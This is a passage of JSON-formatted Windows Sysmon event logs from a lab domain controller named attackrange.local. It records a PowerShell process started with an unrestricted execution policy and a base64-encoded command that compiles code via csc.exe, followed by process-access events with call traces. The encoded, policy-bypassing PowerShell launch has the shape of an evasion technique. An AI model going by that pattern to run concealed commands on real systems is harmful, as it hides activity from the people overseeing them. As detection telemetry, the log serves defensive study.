07:59:19.971","ProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\lgro13a1.cmdline","CreationUtcTime":"2020-08-01 07:59:19.971","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5600,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.981\r\nProcessGuid: {41C8662E-20D7-5F25-0000-001050020900}\r\nProcessId: 4800\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lgro13a1.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nParentProcessId: 3496\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.981","ProcessGuid":"{41C8662E-20D7-5F25-0000-001050020900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lgro13a1.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","ParentProcessId":"3496","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5601,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nSourceProcessId: 3496\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1555B68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","SourceProcessId":"3496","SourceThreadId":"3780","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFD1555B68F)","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5602,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5603,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5604,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5605,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5606,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5607,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 